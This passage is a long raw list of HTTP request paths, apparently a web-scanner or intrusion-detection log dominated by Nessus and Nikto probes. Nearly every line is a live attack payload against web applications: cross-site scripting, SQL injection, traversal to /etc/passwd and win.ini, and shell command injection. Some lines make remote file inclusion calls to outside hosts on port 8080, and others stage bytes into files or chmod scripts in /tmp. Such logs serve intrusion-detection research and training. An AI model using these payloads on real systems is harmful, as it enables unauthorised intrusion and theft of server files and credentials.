content=\"testtkio=5454\">\n/phpmyadmin?username=\"<script>foo</script\n/scripts/2pwudii1mt22.php\n/0u75ldxq.php3?<script>cross_site_scripting.nasl</script>\n/7uz3ok60.dll?<script>cross_site_scripting.nasl</script>\n/en-us/account/index.php?cat_select=<script>foo</script>\n/manager/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/javascript/report.exe\n/en-us/s7qus4g3.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgis/texis.exe/junk\n/scripts/cgi-bin/gm-comments.cgi\n/scripts/nckowqpd4zng.cfm\n/gpg-script/\n/examples/jsp/colors/showcat.php?cat=1'\n/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=\";echo ''; echo `id `;die();echo\"\n/iv5vkgam.nsf?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/apavxugx.jspa?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/web_scripts/\n/cgi-bin/pbcgi.cgi?nikto=joe\\xcamel&email=<script>alert('vulnerable');</script>\n/examples/jsp/jsp2/el/nslookup.cgi?query=localhost;id&type=any&ns=\n/j734qobz.jspa?<script>cross_site_scripting.nasl</script>\n/cgi.cgi/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/help.php?q='\\x0arm q83228487 #\n/main.php?logout=1' and 1=1 and ''<>'zcztvbfx\n/javascript/document.dump\n/a0imiuf1.fts?<script>document.cookie=\"testxqrn=4654;\"</script>\n/scripts/qop0sa1auif9.cgi\n/cacti/secure.php?cfgprogdir=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/error/more.php?id=1'\n/main.php?logout=\";uname #\n/g3w7y7u5.html?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/help.php?q=\"ver&rem\\x0c\n/1qwv2p5p.php?<script>document.cookie=\"testvqcy=252;\"</script>\n/ap58k3ci.idc?<script>cross_site_scripting.nasl</script>\n/movie scripts/\n/en-us/33y9gcqq.php3?<script>document.cookie=\"testnvxc=4301;\"</script>\n/cgiscriptor-1/\n/j734qobz.html?<script>cross_site_scripting.nasl</script>\n/cgi-bin/query?mss=../config\n/top.php?stuff=\"|ping;-w;8000;-n;1;1.2.3.4|rem;\n/scripts/apgafvcxoeeh.shtml\n/script/tick/allincludefortick.php?path_to_code=@rfiurl\n/en-us/jnv890lt.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9ko6m4c8.jspa?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/examples/jsp/colors/view_user.php?list=1&letter=&sort_by='select\n/htbin/.htpasswd\n/main.php?stuff=\\x0duname >q48473824 #\n/l'astrologue_3/\n/zqqemp6j.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n//</p><body><script/src=\"http://www.example.com/test?rnd=q21787716\"></script><p>\n/examples/jsp/colors/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/checkbox/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/scripts/search?q=http://www.nessus.org/\n/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=<script>alert(vulnerable)</script>\n/examples/jsp/sessions/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/382-publishersdescription/\n/help.php?q=';del q16954753 #\n/scripts/msmmask.exe?mask=/nessus893655960.asp\n/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd\n/scripts/rss.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/examples/jsp/checkbox/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/oh that's tight 4/\n/scripts/rvckwz6smkqf.php\n/main.php?stuff=\"&uname\\x09#\n/top.php?stuff=&ver;>q99662165&rem;\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010397\n/refdescriptor/\n/javascript/overview.exe\n/scripts/rss.scr.php?globals[pth][classes]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/cgi-bin/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/nuh3zirz.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/pafiledb.php\n/examples/jsp/colors/config.php?path[docroot]=/etc/passwd\\x00\n/examples/jsp/error/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/en-us/oie504mr.html?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/scripts/d3z7yywpyeoa.php3\n/cgi-914/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/shared_order.php?sharedplanid=1\"><script>alert(\"411696083443\");</script><\"1\n/examples/jsp/colors/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/top.php?stuff=\"&ping,-w,9000,-n,1,1.2.3.4&rem,\n/0w155a7c.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/3j8echh0.jspa?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/scgi-bin/c32web.exe/changeadminpassword\n/en-us/account/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/help.php?q='&uname\\x09>q13548493\\x09#\n/cgi-915/cgi-test.exe\n/ap58k3ci.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/scripts/ovlaunch.exe\n/cgi-bin/vq/demos/respond.pl?<script>alert('vulnerable')</script>\n/javascript/phpbb.exe\n/examples/servlets/servlet/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/scripts/hosting/addreseller.asp?reseller=resadmin\n/scripts/d3z7yywpyeoa.cfm\n/scripts/shop.plx/page=nessus837107598\n/en-us/account/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass=\n/examples/jsp/colors/faq.php?action=&type=view&s=&id=-1' union select 0,421830018,0,0,0,0,0--\n/recordings/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/main.php?logout=\"&ver&rem,\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/txenjrxf3?\n/fa8p8lr8.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/forum_arc.asp?n=/etc/passwd|36|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/main.php?logout=\"|ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/examples/jsp/colors/htgrep/file=index.html&hdr=/etc/passwd\n/egaet53a.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/t3af3tdz.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/starnet/addons/slideshow_full.php?album_name='1043149731\n/examples/jsp/checkbox/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+1a00+>>ctdn\n/scgi-bin/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/ewc3rz1l.jsp?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/scripts/wsisa.dll/wservice=wsbroker1/webutil/ping.p\n/javascript/10.exe\n/r3le3om5.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=@rfiurl?install_dir=@rfiurl?&lm_absolute_path=../../../\n/en-us/w4996nr0.php?<script>document.cookie=\"testttvs=7163;\"</script>\n/7u1pb2xi.do?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/scripts/ui/login?user=nessus-1331921918\n/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1\n/ygkjkngd.jsp?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/examples/jsp/cal/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/main.php?logout=\"|ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/main.php?stuff=\";rm q62299957 #\n/manual/en/programs/htpasswd.html\n/rv98iwjp.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/sawmillcl.exe?ho+{complete_version}\n../../../../../../../../../../etc/*\n/jsp-examples/snp/snoop.jsp;<script>alert(412175577678)</script>test.jsp\n/help.php?q=&ver\\x09>q78158465&rem\\x09\n/nmw0do67.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/fo564rei.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='uname >q41634876 #\n/uvazfs7p.cfm?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/examples/jsp/error/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/examples/jsp/cal/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/main.php?logout=\"ping,-w,11000,-n,1,1.2.3.4&rem,\n/bmeun223.jsp?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/uc3w3bdi.fts?<script>document.cookie=\"testxllt=9940;\"</script>\n/citrix/nfuse/default/login.asp?nfuse_logoutid=&nfuse_messagetype=error&nfuse_message=<script>alert('ritchie')</script>&clientdetection=on\n/top.php?stuff=\"ver&rem\\x0c\n/javascript/xerces.exe\n/help.php?q='&del q67988136 #\n/top.php?stuff=\"ping,-w,9000,-n,1,1.2.3.4|rem,\n/mv8wxfy9.htm?<script>document.cookie=\"testrhbc=8184;\"</script>\n/help.php?q=ver >q85131491&rem \n/examples/jsp/checkbox/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/fnwhrxyd.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/orkut-xss/\n/scripts/rihzp7swr3p6.sh\n/[seccheck]/../../ext.ini\n/scripts/ttx.cgi\n/en-us/account/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/cacti/story.pl?next=../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/cgi-bin/cgimail.exe\n/transcript_day3/\n/ddoworrl.fts?<script>document.cookie=\"testvlau=8517;\"</script>\n/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/5qnlm5z2.php3?<script>document.cookie=\"testsixi=8451;\"</script>\n/h21y8w52.kspx?<script>cross_site_scripting.nasl</script>\n/6dlc2zm9.jsp?<script>document.cookie=\"testqpux=4016;\"</script>\n/0qhcnefz.nsf?<script>cross_site_scripting.nasl</script>\n/mail.php?id='/**/union/**/select/**/1,2,1332010406,4--&blog=1\n/scripts/index.php?src=1&_common=1&time=1331904460&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=\"rm\\xa0q88986355&rem\\xa0\n/main.php?logout=\"ver\\x0c>q35989384&rem\\x0c\n/help.php?q=\"ver\\x0c>q43893615&rem\\x0c\n/cgi-bin/..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/3m5knyc4.x?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/examples/servlets/servlet/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/jscript.php?my_ms[root]=http://192.168.202.118:8080/2aibfaczmac8??\n/m5103snj.jspa?<script>cross_site_scripting.nasl</script>\n/cgi-bin/wiki.php/<script>foo</script>\n/x7pclv4s.aspx?<script>document.cookie=\"testiulz=3709;\"</script>\n/scripts/rss.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/examples/jsp/error/sgdynamo.exe?htname=<script>foo</script>\n/scripts/sws/admin.html\n/en-us/w4996nr0.exe?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/examples/jsp/cal/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/tukodz3j.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/lmw4r201.cgi?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/javascript/403.exe\n/top.php?stuff=;uname >q32339198 #\n/javascript/corp.exe\n/examples/jsp/checkbox/webplus.exe?script=webplus_install_path.nasl\n/..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/phpmyadmin/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/children's/\n/scripts/guestbook/view.php?pg=foobar\n/en-us/33y9gcqq.kspx?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/scripts/pssdseehtgdp.cgi\n/scripts/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/en-us/account/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/examples/jsp/sessions/minis.php?month=../../../../../../etc/passwd\n/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd\\x00\n/javascript/template.exe\n/help.php?q='&sleep\\x097\\x09#\n/generalattackdescriptions/\n/webcgi/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/main.php?stuff=\"\\x0duname >q25775847 #\n/cacti/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/cal/search.jsp?q=%\"<script>alert(1331904374)</script>\n/help.php?q='\\x0ddel q75815481 #\n/ao22ww7y.exe?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/main.php?stuff=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/edv3mapy.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/j2kdmfw4.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/cgi-915/vssetcookie.exe\n/3m5knyc4.jspa?<script>document.cookie=\"testbgqj=6434;\"</script>\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../vtigerservice.php\\x00\n/8t9v8k7x.php3?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/vmi8bb12.exe?<script>document.cookie=\"testlerc=2575;\"</script>\n/help.php?q=\"&ver&rem\\x09\n/9ko6m4c8.asp?<script>document.cookie=\"testylik=3403;\"</script>\n/script/ident/identification.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/scripts/starnet/addons/slideshow_full.php?album_name='951824256\n/jw64yq8u.mscgi?<script>document.cookie=\"testylfu=1313;\"</script>\n/js/scripts.php?load=/etc/passwd\\x00\n/t7tm4m0b.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/fcgi-bin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/examples/jsp/checkbox/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/_vti_bin/fpremadm.exe\n/p2p.exe\n/examples/jsp/jsp2/el/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/scripts/www/delivery/ac.php?bannerid=-1332009302+or+1=1+--+';passthru(base64_decode($_server[http_nessus_lh4qb_mt]));die;/*\n/help.php?q=\"\\x0dsleep 11 #\n/cgi-bin/index.php?op=default&date=200607' union select 1,230342059,1,1,1,1,1,1,1,1--&blogid=1\n/ygkjkngd.mscgi?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/fo564rei.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://cirt.net/rfiinc.txt?\n/j2kdmfw4.x?<script>cross_site_scripting.nasl</script>\n/a0imiuf1.do?<script>document.cookie=\"testxqrn=4654;\"</script>\n/zroo33l4.jspa?<script>document.cookie=\"testiklc=904;\"</script>\n/examples/jsp/error/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/teknoscript/\n/examples/jsp/cal/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/help.php?q=ver\\x0b>q48179229&rem\\x0b\n/rpxyx07v.fts?<script>document.cookie=\"testbnli=1975;\"</script>\n/33y9gcqq.cfc?<script>document.cookie=\"testnvxc=4301;\"</script>\n/iv5vkgam.idc?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/scripts/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/fcgi-bin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/qb2xy9aw.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"del q85581856&rem \n/edv3mapy.dll?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/j4drbkil.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ovcgi/toolbar.exe?context=snmp\n/9kr0ih0v.x?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/main.php?logout='\\x0adel\\x09q63945264\\x09#\n/l4fz1dqw.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ping -w 7000 -n 1 1.2.3.4|rem \n/description_rss/\n/en-us/w4996nr0.aspx?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/examples/jsp/jsp2/el/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/examples/jsp/cal/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/javascript/_common.exe\n/examples/jsp/num/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/main.php?logout=\"ping\\x09-w\\x099000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/help.php?q=\"del\\x0cq43893615&rem\\x0c\n/en-us/oie504mr.idc?<script>document.cookie=\"testtpby=7052;\"</script>\n/qczkquis.jspa?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/mv8wxfy9.asp?<script>document.cookie=\"testrhbc=8184;\"</script>\n/vjbrrppi.jspa?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"&rm q63418787&rem \n/javascript/advertise.exe\n/examples/servlets/servlet/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats211141.txt\n/top.php?stuff=\"\\x0asleep\\x098\\x09#\n/main.php?logout=\"rm;q82885471&rem;\n/scripts/dataservice.asmx/authuser?username='nessus1331919210&password=nasl&needcompress=0\n/81_tony's amateur tapes-5/\n/acart2_0/deliver.asp?msg=<script>alert(\\\"test\\\")</script>\n/examples/jsp/jsp2/jspx/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/javascript/nuke.exe\n/iktok2bw.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='1999868906\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3flogout%3d1&frm_user=&scr_height=q43355524&scr_width=\n/lsoix5h3.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&del;q41942739&rem;\n/examples/jsp/checkbox/webadmin.php?show=/etc/passwd\n/php scripts package/\n/manager/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/ao22ww7y.pl?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/v3axg1p8.html?<script>document.cookie=\"testxagh=6987;\"</script>\n/cgi-bin/forum/hcspecific/enableforum.asp?action=enableforum&forumid='hosting_controller_forumid_sql_injection.nasl\n/yver8r9o.fts?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/index.php?user_langue=../../../../../../../../../../etc/passwd\n/examples/jsp/num/admin/admin.php?sid=0'\n/administrator/gallery/view.php?path=\\\"<script>alert(document.cookie)</script>\n/examples/jsp/checkbox/styles.php?toroot=/etc/passwd\\x00\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 500066955,2,800036118,4,5,6,7,8,9,0,1,2,3 --\n/scripts/udblphlq4nln.html\n/j4rdyhw8.cgi?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/examples/jsp/jsp2/el/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/error/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/en-us/account/www/delivery/ac.php?bannerid=-1331905039+or+1=1+--+';passthru(base64_decode($_server[http_nessus_o661njjc]));die;/*\n/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/javascript/security.exe\n/examples/jsp/jsp2/el/index.php?op=default&date=200607' union select 1,727670276,1,1,1,1,1,1,1,1--&blogid=1\n/phpmyadmin/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/nuh3zirz.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/1qwv2p5p.jspa?<script>document.cookie=\"testvqcy=252;\"</script>\n/cgi-bin/loadpage.cgi?user_id=1&file=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini\n/h4bi26jd.html?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/ao22ww7y.jspa?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/help.php?q='\\x0auname >q22265597 #\n/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/zz5thkvtmlgl??\n/cgi-exe/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+8b+48+04+01+d1+89+4d+fc+8b+78+08+8b+40+0c+01+d0+01+d7+89+45+f8+73+27+60+8b++>>ctdn\n/oie504mr.pl?<script>document.cookie=\"testtpby=7052;\"</script>\n/zuihld5m.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/download.php?language=/etc/passwd\\x00\n/cgi-win/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/scripts/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/help.php?q=\\x0duname >q48627663 #\n/examples/jsp/jsp2/jspx/sawmill6cl.exe?ho+{complete_version}\n/h5i6crm3.php3?<script>document.cookie=\"testlihk=7070;\"</script>\n/main.php?stuff=\";uname\\x09#\n/cgi.cgi/sensepost.exe?/c+dir\n/qb2xy9aw.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/les mousquetaires de sexe et d'epee/\n/examples/jsp/checkbox/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/query.idq?citemplate=../../../../../winnt/win.ini\n/cgi-bin/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/examples/jsp/sessionsmultihtml.pl?multi=/etc/passwd\\x00html\n/<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/main.php?stuff=\";uname >q18895618 #\n/examples/jsp/colors/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/el/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/d765w06j.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/examples/jsp/jsp2/jspx/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/examples/jsp/jsp2/el/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/scripts/rihzp7swr3p6.cfm\n/main.php?logout='\\x0auname\\x09>q63945264\\x09#\n/scripts/ashnews.php?pathtoashnews=http://xxxxxxxx/\n/cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('vulnerable');a=[['\n/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/2aibfaczmac8?\n/debug/echo?name=<script>alert('vulnerable');</script>\n/scripts/fake.cgi?arg=/../../../../../winnt/win.ini\n/s7qus4g3.mscgi?<script>cross_site_scripting.nasl</script>\n/dslpwt15.htm?<script>document.cookie=\"testtkio=5454;\"</script>\n/cgi-bin/cart32.exe\n/help.php?q=;uname #\n/javascript/.htaccess.sfish/skipfish://invalid/;?\n/bmeun223.htm?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/scripts/demos/demo.browse.php?filename=/etc/passwd\n/examples/jsp/error/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/tmpdirscripts/\n/t-showtranscript/\n/javascript/europe.exe\n/main.php?stuff=\"|sleep\\x099\\x09#\n/cgi-home/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/scripts/manager/\n/33y9gcqq.cfc?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/pxagj7n7.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7dbjwpw6.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/errorfaq.php?skin=../../admin/manager&tplpath=admin\n/javascript/c.exe\n/ows-bin/ppdscgi.exe\n/odzk29aa.cgi?<script>document.cookie=\"testtfvh=2141;\"</script>\n/scs86g1p.php?<script>document.cookie=\"testquyx=2820;\"</script>\n/manager/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/scripts/gitweb.perl\n/javascript/.passwd.war\n/examples/jsp/sessions/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/top.php?stuff=\"&ver\\xa0>q52711668&rem\\xa0\n/axis2/services/version?xsd=../../../../../../../../../../../etc/passwd\n/scripts/shop.plx/page=nessus1238203526\n/g8nu2yy7.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/recordings/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/vwmg565s.cfm?<script>cross_site_scripting.nasl</script>\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349\n/b4vng02k.do?<script>document.cookie=\"testtrlh=3672;\"</script>\n/bxnyrhmh.exe?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/top.php?stuff=\"&ver&rem\\x0b\n/en-us/n9xlumt5.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/uc3w3bdi.pl?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/<script>cross_site_scripting.nasl</script>.jspa\n/oie504mr.cgi?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/top.php?stuff=\"&ping -w 10000 -n 1 4.3.2.1&rem \n/cgibin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/scripts/openview5.exe?target=main&action=../../../../../../../../../..//winnt/win.ini\n/iktok2bw.idc?<script>cross_site_scripting.nasl</script>\n/top.php?stuff='\\x0auname >q53951968 #\n/weq93ppb.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/php.cgi?/etc/passwd\n/webcgi/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/en-us/ddoworrl.mscgi?<script>document.cookie=\"testvlau=8517;\"</script>\n/javascript/compact.exe\n/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/cgis/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/snippetmaster/includes/vars.inc.php?_session[script_path]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/phpmyadmin/core/editor.php?editor_insert_bottom=/etc/passwd\n/top.php?stuff=rm;q97535751&rem;\n/scripts/axdgpyi2bn6f.inc\n/help.php?q=\\x0auname >q49975667 #\n/top.php?stuff=&ver\\x0b>q91214717&rem\\x0b\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+72+65+73+73+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00++>>ctdn\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/ebdxfyfaow.sh').\"]=1\n/report.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl??\n/ap58k3ci.exe?<script>cross_site_scripting.nasl</script>\n/edzaia0i.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/raanw4ia.cgi?<img 